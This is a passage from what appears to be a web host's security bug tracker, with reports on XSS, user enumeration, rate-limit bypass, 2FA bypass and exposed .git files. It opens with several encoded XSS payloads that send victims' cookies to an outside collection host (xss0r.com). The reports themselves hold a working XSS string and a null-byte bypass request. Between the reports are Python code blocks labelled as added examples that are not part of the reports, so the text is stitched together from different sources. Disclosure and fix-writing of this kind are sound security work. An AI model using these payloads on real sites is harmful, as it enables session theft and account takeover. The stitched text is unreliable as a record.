--%253E%253C%252FtiTle%253E%253C%252FstYle%253E%253C%252FtexTarea%253E%253C%252FscrIpt%253E%2522%252F%252F%2527%252F%252F%253E%253CscrIpt%2520src%253D%2522https%253A%252F%252Fxss0r.com%252Fc%252Fsabeesh%2522%253E%253C%252Fscript%253E
javascript:
%27%22%3E%3Cscript%20src%3Dhttps%3A%2F%2Fxss0r.com%2Fc%2Fsabeesh%3E%3C%2Fscript%3E
'"><script src=https://xss0r.com/c/sabeesh></script><img src=x onerror=fetch('https://xss0r.com/c/sabeesh?c='+document.cookie)>
javascript:%22%3E%3Cscript%20src%3Dhttps%3A%2F%2Fxss0r.com%2Fc%2Fsabeesh%3E%3C%2Fscript%3E
javascript:
%27%22%3E%3Csvg%20onmouseover%3D%22fetch('https://xss0r.com/c/sabeesh?data='+document.cookie)%22%3E%3C%2Fsvg%3E
javascript:/*'/*`/*\" /*</title></style></textarea></noscript></noembed></template></script/-->&lt;svg/onload=/*<html/*/onmouseover=fetch('https://xss0r.com/c/sabeesh?cookie='+document.cookie)>
javascript:
</script></textarea></style></noscript></noembed></script></template>&lt;svg/onload=/*fetch('https://xss0r.com/c/sabeesh?cookie='+document.cookie)/*--><html */ onmouseover=alert()//>
 104  Bug Report: Vulnerability in User Addition Feature Lead ...  Closed  25.11.2024  Task Description

Bug Report: Vulnerability in User Addition Feature Leading to Email Blockage Exploit

Subject: Misconfiguration in User Addition Feature - Enables Permanent Blockage of Employee/User Emails

To:
Security Team
alwaysdata

Description:
The "Add a User" feature in your application has a critical misconfiguration that allows attackers to exploit email handling mechanisms. The vulnerability permits any email address, including sensitive ones like victim@alwaysdata.com or employee@alwaysdata.com, to be registered by an attacker under their account. This issue occurs irrespective of whether the victim is an actual user or employee of alwaysdata.
Key Problem:
Once an attacker registers email addresses to their account, the application erroneously considers these emails as "already in use." Consequently, legitimate users or employees are unable to:
• Register with their own email addresses.
• Recover passwords using the "Forgot Password" feature.
This creates a significant denial of service for legitimate users, especially for employee emails or those critical to operations.

Steps to Reproduce:
1. Log in to the application:
o The attacker logs into their account on alwaysdata.
2. Access the "Add a User" Feature:
o Navigate to the "Add a User" section.
3. Add Any Email Address:
o Enter any target email (e.g., victim@alwaysdata.com, employee@alwaysdata.com, or database_admin@alwaysdata.com) and add it as a user.
4. Observe the Impact:
o The entered email is stored in the database, associating it with the attacker’s account.
o Legitimate users or employees attempting to register with their email or recover their account using "Forgot Password" are blocked as their emails are flagged as already registered.

Business Impact:
1. Disruption of Operations:
Employees using critical emails (e.g., employee@alwaysdata.com, support@alwaysdata.com) are prevented from accessing the platform. This can halt workflows and damage operational continuity.
2. Customer Impact:
Legitimate customers with hijacked email registrations are blocked from using the platform, leading to frustration and loss of trust.
3. Potential Abuse:
o Attacker could pre-register a large list of potential or known email addresses (e.g., 100+ victims).
o Targeted denial of service campaigns against specific users or employees.
4. Reputational Damage:
Affected users may view alwaysdata as insecure and prone to misuse.

Severity:
Moderate to High

Remediation Steps:
1. Email Validation:
Restrict the registration of emails ending with @alwaysdata.com to prevent abuse of employee addresses.
2. Duplicate Email Handling:
Implement a verification mechanism to check if an email is legitimately registered to an account and ensure users can still register or recover their accounts.
3. Audit "Add a User" Logic:
Validate and sanitize inputs to avoid unauthorized addition of unrelated or sensitive emails.
4. Email Ownership Verification:
Mandate email verification for all newly added users before finalizing their association with an account.

Video POC:
A detailed POC has been attached showcasing the reproduction of this bug and its consequences.
https://drive.google.com/file/d/1TBi7njRCCsqkHhAEri7viUmyGot1Pyf5/view?usp=sharing

 105  open redirect  Closed  25.11.2024  Task Description

https://example.com

 106  Bug Report: Broken Access Control on 2FA Leading to Pre ...  Closed  25.11.2024  Task Description

Subject: Misconfiguration in 2FA Implementation Allows Pre-Complete ATO

To:
Security Team
alwaysdata

Description:
The lack of email verification before enabling Two-Factor Authentication (2FA) introduces a critical vulnerability that can facilitate pre-complete Account Takeover (ATO). An attacker can register email addresses resembling critical system accounts (e.g., administrator@alwaysdata.com or support@alwaysdata.com) without any validation.
This misconfiguration allows the attacker to appear as legitimate users or administrators by exploiting the following gaps:
1. Email Address Control:
The attacker registers administrator@alwaysdata.com (since admin@alwaysdata.com is already in use) or similar critical addresses such as support@alwaysdata.com. This bypass occurs because the application does not verify email ownership before enabling 2FA.
2. Pre-Complete ATO via 2FA:
Once the attacker controls the fake email, they enable 2FA. This results in the following:
- The email becomes "locked" for the attacker's use.
- Real administrators or support users cannot register or regain control of these emails.
- Critical accounts, if assumed to be associated with internal roles, are exploited for phishing or denial of service.
This oversight compromises account security and can lead to severe operational and reputational risks for alwaysdata.

Steps to Reproduce:
1. Register as a New User:
- Create a new account with an email resembling a sensitive system role (e.g., administrator@alwaysdata.com or support@alwaysdata.com).
2. Set Up 2FA on the Account:
- Enable Two-Factor Authentication without any email ownership verification.
3. Observe the Impact:
- The attacker now controls a seemingly legitimate account.
- Real users or employees attempting to register or recover accounts with these emails are blocked.
4. Potential Exploit:
- Use the compromised "fake admin" email to trick other users or employees.
- Execute phishing attacks or leverage the fake email for social engineering attempts.

Business Impact:
1. Operational Risk:
- Legitimate users or employees are unable to access critical accounts (e.g., admin@alwaysdata.com or support@alwaysdata.com).
- This could lead to service disruptions and hinder internal workflows.
2. Security Risks:
- Attackers can impersonate sensitive roles and deceive users or employees.
- Creates opportunities for phishing, fraud, and social engineering attacks.
3. Reputational Damage:
- Users and employees may lose trust in alwaysdata due to perceived weak account protection mechanisms.
4. Pre-Complete ATO:
- Attacker gains control of accounts with system-level trust (e.g., admin-like emails) without the ability of real users to regain access.

Severity:
High

Remediation Steps:
1. Mandate Email Verification:
Require all email addresses to be verified during registration and before enabling 2FA.
2. Restrict Critical Email Formats:
Disallow registrations with email addresses resembling sensitive roles (e.g., admin, administrator, support).
3. Enforce Ownership Validation:
Implement strict validation to ensure that users can only enable 2FA on accounts they genuinely own.
4. Audit Existing Accounts:
Identify and rectify any unverified accounts with potentially sensitive email addresses.

Video POC:
A detailed demonstration of the exploit steps is attached to this report to illustrate the issue clearly.
https://drive.google.com/file/d/17DNkoihfOW7jyMoY_eWMGNiigNY4Zmo7/view?usp=sharing

 108  Email Enumeration  Closed  26.11.2024  Task Description

Email Enumeration:

Hello Team, I hope you are doing well. While researching your domain, I found email enumeration in your domain.

Steps:

1. Log in to your admin.alwaysdata.com account and go to Profile.
2. Choose "Change my email".
3. Enter your password.
4. Enter any email you want to check.
5. If the email isn't registered, a message appears saying "The email is changed."
6. If it is registered, the message that appears is "There is already a profile with this email."

By automating the process you can easily enumerate users' emails. What is the impact:
1. Mass password reset requests to registered users (spam).
2. Imagine a new company like alwaysdata wants to advertise: it could easily enumerate alwaysdata's customer emails and send those customers emails to convince them to join the new company and leave. This may cause you to lose some of your customers (targeted advertising through the alwaysdata database).
There are other impacts, but those are the most severe.

Here is the fix:
When a user tries to assign an email that is already registered to one of your accounts, tell them "An error has occurred" or "We have sent a verification email to your email address", or anything that does not reveal that the address is registered with you.
Here is the POC:
I carried out the attack on a sample of 8845 emails to avoid server overload.
The result: using Burp Suite, I can brute-force the change email feature and enumerate users by the status code in the Intruder attack:
200 -> not registered and can be added
500 -> registered and error message
400 -> invalid email, because for example it doesn't have an @ sign in it

Thank You,
Waleed Anwar

112  Bypass rate limiting on reset password (possibly site-w ...  Closed  27.11.2024  Task Description

Hi Team,

I found a rate limit bypass in reset password endpoint.

If we send the following POST:

POST /password/lost/ HTTP/2
Host: admin.alwaysdata.com
Cookie: csrftoken=xxxxxxxx………………; django_language=en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://admin.alwaysdata.com/password/lost/
Content-Type: application/x-www-form-urlencoded
Content-Length: 113
Origin: https://admin.alwaysdata.com
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers

csrfmiddlewaretoken=xxxxxxxxxxxxxxx…………………..&email=example%40gmail.com

Now send the request around ~50 times and it'll hit "Too Many Requests". Now simply add %00 to the end of the email and resend even more password reset emails:
&email=example%40gmail.com%00 - and keep adding %00 every time you are rate limited. After a while you can go back to just %00, as the limit resets after some time.

No real impact with just mass emailing someone a reset password link, but I thought it was worth reporting because the rate limiting bypass might exist in other areas (with the use of the null byte %00)

Thank You,

Waleed Anwar
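The bypass above works when the limiter keys its bucket on the raw form value, so every extra %00 creates a fresh bucket. The following is an added example (not alwaysdata's code and not part of the report) of a reset handler written both ways in Python: a naive handler that keys on the raw parameter and a hardened one that validates and canonicalises the address first, then limits per client IP and per mailbox. The window, request counts, function names and the in-memory limiter are assumptions; it also assumes the framework has already URL-decoded the body, so %00 arrives as U+0000.

```python
import re
import unicodedata
from collections import defaultdict
from typing import Dict, List, Optional

# Constructed example: a sliding-window limiter for a password-reset form.
# The naive handler keys the limiter on the raw form value, so "a@b.com",
# "a@b.com\x00" and "a@b.com\x00\x00" each get a fresh bucket, which is the
# bypass the report describes. The hardened handler canonicalises the address
# first and rejects anything containing control characters.

WINDOW_SECONDS = 600      # assumed policy: 5 requests per 10 minutes
MAX_REQUESTS = 5

_EMAIL_RE = re.compile(r"^[^@\s]+@[^@\s]+\.[^@\s]+$")


def canonical_email(raw: str) -> Optional[str]:
    """Canonical form of an e-mail address, or None if it is not acceptable.

    Control characters (NUL included) are rejected rather than stripped, so an
    attacker cannot choose a different raw value that maps to the same mailbox.
    """
    if any(unicodedata.category(ch).startswith("C") for ch in raw):
        return None
    norm = unicodedata.normalize("NFKC", raw).strip().lower()
    if len(norm) > 254 or not _EMAIL_RE.match(norm):
        return None
    return norm


class SlidingWindowLimiter:
    """In-memory limiter: at most max_requests hits per key in any window."""

    def __init__(self, max_requests: int = MAX_REQUESTS, window: int = WINDOW_SECONDS):
        self.max_requests = max_requests
        self.window = window
        self._hits: Dict[str, List[float]] = defaultdict(list)

    def allow(self, key: str, now: float) -> bool:
        recent = [t for t in self._hits[key] if now - t < self.window]
        if len(recent) >= self.max_requests:
            self._hits[key] = recent
            return False
        recent.append(now)
        self._hits[key] = recent
        return True


def naive_reset(limiter: SlidingWindowLimiter, client_ip: str, raw_email: str, now: float) -> int:
    """Vulnerable: the raw parameter is part of the bucket key."""
    if not limiter.allow(f"{client_ip}|{raw_email}", now):
        return 429
    return 200  # a real handler would enqueue the reset mail here


def hardened_reset(limiter: SlidingWindowLimiter, client_ip: str, raw_email: str, now: float) -> int:
    """Fixed: validate and canonicalise first, then limit per client and per mailbox."""
    email = canonical_email(raw_email)
    if email is None:
        return 400
    # Both buckets are checked; every variant of the address an attacker can type
    # collapses to the same "mail|" bucket, and the client IP is limited on its own.
    if not limiter.allow(f"ip|{client_ip}", now) or not limiter.allow(f"mail|{email}", now):
        return 429
    return 200
```

The per-mailbox bucket is what closes the bypass: case changes, surrounding whitespace and Unicode look-alikes all canonicalise to the same key, and anything containing a control character is refused with 400 before it reaches the limiter at all. Keying on the client IP alone is not enough, because the report's attacker can rotate addresses as easily as they can append bytes.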

135  local software files disclosure  Closed  05.03.2025  Task Description

Reproduction steps:
Using Google dorks, search for
site:alwaysdata.com intitle:index.of
It shows 2 sites:
https://files.alwaysdata.com/
https://files.alwaysdata.com/migrations/software-2020/
The 2 files give me 404 forbidden.

PoC
Searching for files.alwaysdata.com in the Wayback Machine, I can now access the pages without the forbidden message.
It contains software-2017 and software-2020.
https://web.archive.org/web/20241007181407/https://files.alwaysdata.com/migrations/ is an index page; it shows software files that can be downloaded.

17  Lack of password confirmation on account deletion  Closed  19.01.2024  Task Description

Hello support teams,
I hope this email finds you well. I am Devansh. I am a security researcher and I found a vulnerability in your website.

Bug name: Lack of password confirmation on account deletion

Description: The user account can be deleted without confirming the user's password or re-authentication.
The removal of an account is one of the sensitive parts of any application that needs to be protected; therefore removing an account should validate the authenticity of the legitimate user.

Steps to reproduce:

1. Go to account settings and click on "delete account".

2. On the next page, click on the "delete my account now" option.

3. You will see the message that the account has been deleted and be logged out.

Remediation:
The system must confirm the authentic user before performing such a task. A link can be sent to the user's email address that can be used for the delete operation. Otherwise the user's password should be provided to the application to confirm the user's identity.

It seems to be of very low impact, but consider a situation where a user forgets to log out of his account, or someone gets access to his phone and deletes the account. This situation is more severe than account takeover, as there is no way to get the account back. All the saved information and data, including previous records, card information etc., can be deleted.

video poc is attached

Thanks and regards
Devansh

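The remediation the report asks for is a re-authentication gate on the destructive action. Below is an added example of such a gate in Python (not alwaysdata's code and not part of the report): deletion succeeds only if the caller supplies the current password now, or confirmed it within a short window, and a wrong password leaves the account untouched. The window length, PBKDF2 parameters, user table and function names are assumptions for the example.

```python
import hashlib
import hmac
import os
from dataclasses import dataclass
from typing import Dict, Optional

# Constructed example: a "sudo mode" guard for account deletion. The action goes
# through only if the caller either supplies the current password now or
# confirmed it within the last REAUTH_WINDOW seconds. A stolen-but-idle session
# therefore cannot delete the account on its own.

REAUTH_WINDOW = 300      # seconds a password confirmation stays valid (assumed policy)
PBKDF2_ROUNDS = 100_000  # assumed; tune to the deployment's hardware


def hash_password(password: str, salt: Optional[bytes] = None) -> bytes:
    """salt || PBKDF2-HMAC-SHA256(password), as a single opaque blob."""
    salt = salt or os.urandom(16)
    return salt + hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ROUNDS)


def verify_password(password: str, stored: bytes) -> bool:
    salt, digest = stored[:16], stored[16:]
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ROUNDS)
    return hmac.compare_digest(candidate, digest)   # constant-time comparison


@dataclass
class Session:
    user_id: int
    last_reauth: float = 0.0   # unix time of the last successful password confirmation


def delete_account(session: Session, users: Dict[int, bytes],
                   password: Optional[str], now: float) -> str:
    """Return one of 'deleted', 'bad_password', 'reauth_required'.

    users maps user id -> stored password hash; the account is removed from it
    only after the identity check passes.
    """
    if password is not None:
        if not verify_password(password, users[session.user_id]):
            return "bad_password"          # wrong password: nothing changes
        session.last_reauth = now          # fresh confirmation, reusable for REAUTH_WINDOW
    elif now - session.last_reauth > REAUTH_WINDOW:
        return "reauth_required"           # idle session: ask for the password first
    del users[session.user_id]
    return "deleted"
```

The same guard belongs in front of every irreversible or account-controlling action (e-mail change, 2FA reset, API key rotation), and a failed password attempt should count against the login rate limiter so the gate cannot be brute-forced from a hijacked session.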

18  .git file exposed  Closed  18.01.2024  Task Description

Hello support teams,

I hope this email finds you well. I am Devansh. I am a security researcher and I am writing to bring to your attention a security vulnerability that I have discovered on your website.

Report of bug is as follows:

Vulnerability name: .git file exposed

Website : https://security.alwaysdata.com/.git/config

Overview of the Vulnerability

The danger occurs when the application leaves the ".git" directory, which is in the system root, exposed. By carelessness, an application that uses Git for versioning can expose the ".git" directory.

Steps to Reproduce

1. Open this website in the browser: https://cdn.anscommerce.com/.git/config

2. You can see the git file is open.

3. With the DotGit extension you can download the git file.

It can be exploited further but may cause harm to your website.

Impact of the vulnerability

The git folder is required to log the whole commit history and all other information required for your remote repository, version control, commits etc. These things are saved in different folders which have different meanings. Once the folder is created, open it and see the

References :

https://medium.com/stolabs/git-exposed-how-to-identify-and-exploit-62df3c165c37

https://www.acunetix.com/vulnerabilities/web/git-detected/

Please consider this as an urgent matter and prioritize the resolution of this vulnerability . if you require any additional information or assistance. Do let me know

Thank you for your attention to this matter, and I look forward to hearing from you soon.

Regards
Devansh
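A reliable check for this class of exposure has to look at the body, not just the status code: many hosts answer 200 for every path with an HTML error page, and a bare directory listing is not the same as a readable repository. The following is an added example (not alwaysdata's code and not part of the report) of that check in Python, with the HTTP client injected so the logic runs offline against constructed responses. The hostnames, probe list and fake fetcher are assumptions; a live run would wrap urllib.request and must only be pointed at hosts you are authorised to test.

```python
import re
from typing import Callable, Dict, List, Tuple

# Constructed example: decide whether a site serves its .git directory. Each probe
# path must come back with HTTP 200 *and* a body that looks like the real Git
# file; a "soft 404" (200 with an HTML error page) or a directory listing does
# not count. The fetcher is injected so the logic runs offline here.

Fetcher = Callable[[str], Tuple[int, bytes]]

PROBES: Dict[str, "re.Pattern[bytes]"] = {
    "/.git/HEAD": re.compile(rb"^(ref: refs/\S+|[0-9a-f]{40})\s*$"),   # symbolic ref or detached SHA-1
    "/.git/config": re.compile(rb"^\s*\[core\]", re.M),               # INI section every repo has
    "/.git/index": re.compile(rb"^DIRC"),                             # binary index magic
}


def git_exposed_paths(base_url: str, fetch: Fetcher) -> List[str]:
    """Return the probe paths that are reachable and carry a Git signature."""
    found = []
    for path, signature in PROBES.items():
        status, body = fetch(base_url.rstrip("/") + path)
        if status == 200 and signature.search(body[:1024]):
            found.append(path)
    return found


def fake_fetcher(responses: Dict[str, Tuple[int, bytes]]) -> Fetcher:
    """Offline stand-in for an HTTP client, backed by a dict of constructed responses."""
    def fetch(url: str) -> Tuple[int, bytes]:
        return responses.get(url, (404, b"Not Found"))
    return fetch


# Constructed sample responses (hostnames are placeholders).
EXPOSED_SITE = fake_fetcher({
    "https://example.test/.git/HEAD": (200, b"ref: refs/heads/main\n"),
    "https://example.test/.git/config": (200, b"[core]\n\trepositoryformatversion = 0\n\tbare = false\n"),
})
SOFT_404_SITE = fake_fetcher({
    "https://soft404.test/.git/HEAD": (200, b"<html><body>Page not found</body></html>"),
    "https://soft404.test/.git/config": (200, b"<html><body>Page not found</body></html>"),
    "https://soft404.test/.git/index": (200, b"<html><body>Page not found</body></html>"),
})
HARDENED_SITE = fake_fetcher({
    "https://hardened.test/.git/HEAD": (403, b"Forbidden"),
    "https://hardened.test/.git/config": (403, b"Forbidden"),
})
```

A positive result on HEAD or config is enough to reconstruct the repository with the tooling the report references. The fix is to keep the repository out of the document root, or to deny the directory at the web server (for nginx, a `location ~ /\.git { deny all; }` block), and to treat any secret that was ever committed as compromised.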

50  *Title:* Two-Factor Authentication Bypass via Support T ...  Closed  24.04.2024  Task Description

*Title:* Two-Factor Authentication Bypass via Support Ticket Creation in [admin.alwaysdata.com]

*Summary:*
A critical security vulnerability has been identified in the [admin.alwaysdata.com]'s account management system where a user with administrative privileges but mandated to use two-factor authentication (2FA) can bypass this requirement by initiating a support ticket under the name of the primary account holder without triggering 2FA.

*Description:*
This vulnerability allows an added user, who is supposed to be restricted by 2FA, to perform actions appearing as the primary account holder by submitting support tickets. This circumvents the security protocol intended to protect sensitive account operations via 2FA, potentially leading to unauthorized actions without the account holder's consent or knowledge.

*Steps to Reproduce:*
1. Create two user accounts, Account A (primary) and Account B.
2. From Account A, add Account B as another user with full administrative privileges but enforce 2FA on actions.
3. Log into Account B.
4. Navigate to the support section and initiate a support ticket, selecting Account A as the affected account.
5. Submit the ticket without being prompted for 2FA verification.

I sent a proof of concept: https://admin.alwaysdata.com/support/77431/367474-VID-20240423-WA0000.mp4

*Impact:*
The primary account holder's security is compromised as the added user can perform sensitive operations under their guise without completing the necessary 2FA checks. This vulnerability may lead to unauthorized access and control over the primary account's sensitive functions and data.

2  XSS Vulnerability in [admin.alwaysdata.com] Support Tic ...  Closed  12.01.2024  Task Description

XSS Vulnerability in [admin.alwaysdata.com] Support Ticket System

Vulnerability Report
Greeting: Dear Team

I'm writing to report a critical Reflected Cross-Site Scripting (XSS) vulnerability discovered in your [admin.alwaysdata.com] application. This vulnerability allows attackers to inject malicious JavaScript into the application, potentially compromising user accounts and sensitive data.

PoC: By sending a specially crafted request containing the payload redhet"'><script>prompt(document.domain)</script> through the add_participants parameter in the support ticket creation form, we can trigger the XSS vulnerability and execute arbitrary JavaScript in the victim's browser.

Summary:

A reflected XSS vulnerability has been identified in the "add_participants" parameter of the support ticket creation form on admin.alwaysdata.com. This vulnerability allows attackers to inject malicious JavaScript code that will be executed in the victim's browser when they view a vulnerable page.

Vulnerability Details:

Type: Reflected XSS (OWASP A4)

Exploit: Injecting malicious JavaScript through a vulnerable request parameter

Vulnerable URL: https://admin.alwaysdata.com/support/add/

Vulnerable Request: POST /support/add/

Vulnerable Endpoints: The add_participants parameter in the support ticket creation form

Payload: redhet"'><script>prompt(document.domain)</script>

This parameter is used to add participants to a support ticket, but it is not properly sanitized, allowing attackers to inject arbitrary code that will be executed in the browser of any user who views the vulnerable ticket.

## Impact Assessment

1. Impact one: Information Disclosure: The attacker can steal sensitive user information, such as cookies or session IDs, by executing malicious JavaScript within the victim's browser.

2. Impact two: Account Takeover: The attacker could potentially hijack user accounts by tricking them into executing malicious code that grants unauthorized access.

3. Impact three: Defacement: The attacker could manipulate the content displayed on the application by injecting malicious JavaScript that alters the user interface.

## Recommendations

1. Step one: Immediately sanitize all user input: Implement strict input validation and sanitization procedures to prevent the injection of malicious code. This includes escaping special characters and enforcing a Content Security Policy (CSP).

2. Step Two: Patch vulnerable software: Update all relevant software to the latest versions to address known vulnerabilities.

3. Step three: Consider additional security measures: Implement a web application firewall (WAF) to further protect against XSS attacks.

4. Step four:Regularly scan for vulnerabilities: Conduct regular penetration testing and vulnerability scans to identify and address potential security issues.

Impact:

Execution of arbitrary JavaScript code in the victim's browser
Potential for session hijacking, credential theft, or other attacks

## Steps to Reproduce

1. Step one: Access the support ticket creation form at https://admin.alwaysdata.com/support/add/

2. Step two: Enter the following payload in the "add_participants" field: redhet"'><script>prompt(document.domain)</script>

3. Step three: Submit the form.

4. Final step: Observe that the JavaScript code is executed, displaying a prompt with the domain name. (cookies)

Attachments
PoC Video: [Link to video demonstrating the vulnerability]

## References

[OWASP XSS Prevention Cheat Sheet]: (https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html)

[OWASP XSS Testing Guide]: (https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/07-Input_Validation_Testing/01-Testing_for_Reflected_Cross_Site_Scripting)

I hope you will give me a good answer!!

If you have any questions, feel free to ask them ;)

Thank You,

Regards,
Redhet
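The report's payload closes an attribute with `"'>` and then opens a script tag, so the fix is context-aware output encoding for the HTML attribute the value lands in, plus input validation for a field that should only ever contain e-mail addresses. The following is an added example in Python (not alwaysdata's template code and not part of the report) showing the vulnerable and the hardened renderer side by side, with a CSP header as defence in depth. The markup, field handling and CSP policy are assumptions for the example.

```python
import html
import re
from typing import List, Tuple

# Constructed example: rendering the "add_participants" value back into the
# support-ticket form. The vulnerable renderer interpolates the raw value into
# an attribute, which is the bug class the report describes; the hardened one
# escapes for the HTML attribute context and only accepts e-mail addresses in
# the first place. Names and markup are assumptions, not alwaysdata's templates.

PAYLOAD = "redhet\"'><script>prompt(document.domain)</script>"   # the payload from the report

# Deliberately strict: quotes and angle brackets can never be part of an accepted address.
_EMAIL_RE = re.compile(r"^[^@\s\"'<>]+@[^@\s\"'<>]+\.[A-Za-z0-9-]+$")

# Defence in depth: even if an escape is missed, inline script is not executed.
CSP_HEADER = ("Content-Security-Policy",
              "default-src 'self'; script-src 'self'; object-src 'none'; base-uri 'self'")


def render_participants_vulnerable(raw_value: str) -> str:
    """Raw interpolation: the payload breaks out of the value attribute."""
    return f'<input name="add_participants" value="{raw_value}">'


def render_participants_hardened(raw_value: str) -> str:
    """Attribute-context escaping; quote=True also encodes the " and ' that close the attribute."""
    return f'<input name="add_participants" value="{html.escape(raw_value, quote=True)}">'


def parse_participants(raw_value: str) -> Tuple[List[str], List[str]]:
    """Split a comma-separated field into (accepted, rejected) addresses.

    Rejected entries are returned so the form can report them, but they must
    still go through render_participants_hardened() if echoed back to the user.
    """
    accepted, rejected = [], []
    for part in raw_value.split(","):
        candidate = part.strip().lower()
        if not candidate:
            continue
        (accepted if _EMAIL_RE.match(candidate) else rejected).append(candidate)
    return accepted, rejected
```

Escaping is per context: `html.escape` is right for element text and quoted attributes, but a value placed inside a JavaScript string, a URL or a CSS block needs that context's encoder instead. Validation reduces the attack surface but is not the primary control; the reflected value must be encoded wherever it is written back, including in error messages that repeat the rejected input.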

19  User Enumeration Through Forgot Password Vulnerability  Closed  29.01.2024  Task Description

The application's "Forgot Password" feature allows user enumeration. This is because the application responds with a different message depending on whether the submitted email address is registered or not.
(https://admin.alwaysdata.com/password/lost/)

Steps to Reproduce:

Access the "Forgot Password" page.
Enter a random, non-registered email address.
Submit the request.
Observe the response message:

The message states "There is no account with this email address," which means that user enumeration is possible.
 An attacker could exploit this vulnerability to:

Gather a list of valid user email addresses.
Launch targeted phishing attacks.
Use the information to attempt password guessing or brute force attacks

Remediation:
Implement Generic Response: The application should provide the same response message regardless of whether the email address is registered or not. This prevents attackers from differentiating between valid and invalid accounts.

Additional Notes:

I am aware that this bug is not eligible for a bounty, but wanted to bring it to the team's attention.

Best Wishes -Basil
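Report 108 (change my email) and this report (forgot password) are the same defect on two endpoints: the HTTP reply differs depending on whether the address is known. The following is an added example in Python (not alwaysdata's code and not part of either report) of both handlers written so that the status code and message are identical on every path, with the distinguishing step moved into the mailbox. The users table, mailer, messages and the pending-change store are assumptions for the example.

```python
import secrets
from dataclasses import dataclass, field
from typing import Dict, List, Tuple

# Constructed example: both the "forgot password" and the "change my email"
# handlers answer with one fixed status and message whether or not the address
# is already known, and move the distinguishing step into the mailbox. The
# users table and mailer are stand-ins, not alwaysdata's code.

Response = Tuple[int, str]

RESET_REPLY: Response = (200, "If an account exists for this address, a reset link has been sent.")
CHANGE_REPLY: Response = (200, "A confirmation link has been sent to the new address. "
                               "The change takes effect once you click it.")


@dataclass
class Mailer:
    outbox: List[Tuple[str, str]] = field(default_factory=list)   # (recipient, subject)

    def send(self, to: str, subject: str) -> None:
        self.outbox.append((to, subject))


def forgot_password(email: str, users: Dict[str, int], mailer: Mailer) -> Response:
    email = email.strip().lower()
    token = secrets.token_urlsafe(32)   # generated on both paths so the work done is similar
    if email in users:
        mailer.send(email, f"Password reset link (token {token})")
    # Unknown address: nothing is sent, but the HTTP reply is byte-for-byte the same.
    return RESET_REPLY


def change_email(current_user: int, new_email: str, users: Dict[str, int],
                 pending: Dict[str, Tuple[int, str]], mailer: Mailer) -> Response:
    """Queue an e-mail change; users is only updated when the confirmation link is used."""
    new_email = new_email.strip().lower()
    token = secrets.token_urlsafe(32)
    if users.get(new_email) not in (None, current_user):
        # Address belongs to someone else: tell *that* mailbox, never the requester.
        mailer.send(new_email, "Someone tried to use this address on another account")
    else:
        pending[token] = (current_user, new_email)   # applied when the link is clicked
        mailer.send(new_email, f"Confirm your new address (token {token})")
    return CHANGE_REPLY
```

Two details matter beyond the message text. First, the status code must match too: the report 108 oracle was 200 versus 500, not the wording. Second, the branches should take comparable time, which is why the token is generated before the lookup; a database round trip that only happens for known addresses is a timing oracle of its own. Deferring the change until the link is clicked also means the new address is verified before it becomes the account's identity.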

20  Unauthorized Access to Over 6000+ Valid User Credential ...  Closed  30.01.2024  Task Description

I have identified a Credential Dump that allows unauthorized access to over 6000+ valid user credentials of Alwaysdata.com. This discovery was made in accordance with the Alwaysdata Bug Bounty Program guidelines. I am reporting this issue to ensure the security and privacy of Alwaysdata's users and to assist in prompt remediation.

Sensitive Data at Risk:

The data exposure includes, but is not limited to, vendor and client details, Personally Identifiable Information (PII), Social Security Numbers, medical and financial records, and crucial authentication credentials.

Impact

If exploited by a malicious actor, this vulnerability could lead to:

-Unauthorized access to user accounts.
-Potential compromise of sensitive personal and financial data.
-Secondary attacks using the obtained credentials (credential stuffing, phishing, etc.).
-Damage to the reputation and trustworthiness of the Alwaysdata platform.

Given the scale of the data exposure (6000+ user credentials), the impact is considered highly critical.

Steps to Reproduce :

To access and reproduce the findings related to the data leak, please follow this link: https://phonebook.cz/. It is important to note that an Academia account is required to view the full extent of the data dump. This platform was where I initially discovered the leak of valid credentials.

For your convenience, I've completed the data compilation myself and attached screenshots that capture key aspects of the data leak. Please find below the attached document containing direct links to the accounts, along with their corresponding emails and passwords. This information was extracted through a manual process, and I've managed to identify at least 30 potential accounts, reviewing their Personally Identifiable Information (PII) among other data. These images should provide a clearer understanding of the issue and assist in verifying the vulnerability.

Proof of Concept
I have attached POC for your reference.I was only able to attach 5 files. If possible,kindly guide me so I can attach more POC's

Remediation Suggestions

To address this vulnerability, I suggest the following immediate and long-term remediation steps:
Revoking current exposed credentials and enforcing a password reset for affected users.
Implementing stricter access controls and regular security audits to prevent similar vulnerabilities.

Confidentiality Agreement

I understand the sensitive nature of this report and agree to keep the details confidential until Alwaysdata has resolved the issue and agreed to disclosure, as per the bug bounty program's guidelines.

I look forward to your prompt response and am willing to provide any further information required for the resolution of this issue. Though the leaked credentials might originate from another application or service, they are your users and I believe it is your call to protect the privacy and data of your users. I would greatly appreciate your team's consideration of rewarding this finding, even if it falls outside the typical scope of your program. Thank you for your commitment to security and the opportunity to contribute to the safety of the Alwaysdata platform.

Regards,
Bad_Script3r
Would really appreciate if you could revert on my Email (akhilsocials@gmail.com)
Thanks and Regards.

21  Bug Bounty Report  Closed  04.02.2024  Task Description

Summary:
A potential security vulnerability has been identified in the user invitation token generation process when integrated with a third-party service. This vulnerability could lead to the leakage of user invitation tokens, potentially exposing sensitive information and compromising the security of user accounts.

Details:
Vulnerability Type: Information Disclosure
Affected Component: User invitation token generation integrated with third-party service
Severity: High
Description:
During our security assessment, it was discovered that the user invitation token, which is generated as part of the user invitation process, is not adequately protected when interacting with a third-party service. This oversight allows unauthorized access to the token, leading to potential exposure of sensitive information.

Steps to Reproduce:
1. Log in to the account.
2. Go to the invite user function and add the email which you want to invite.
3. A token is received at that email for joining the team.
4. Keep your proxy on and click on the invitation link.
5. Set the password and you have successfully joined the team.
6. Now go back to your Burp Suite and search for the invitation token which was received in step 3.
7. You will notice that the token got leaked to third parties as well.

Impact:
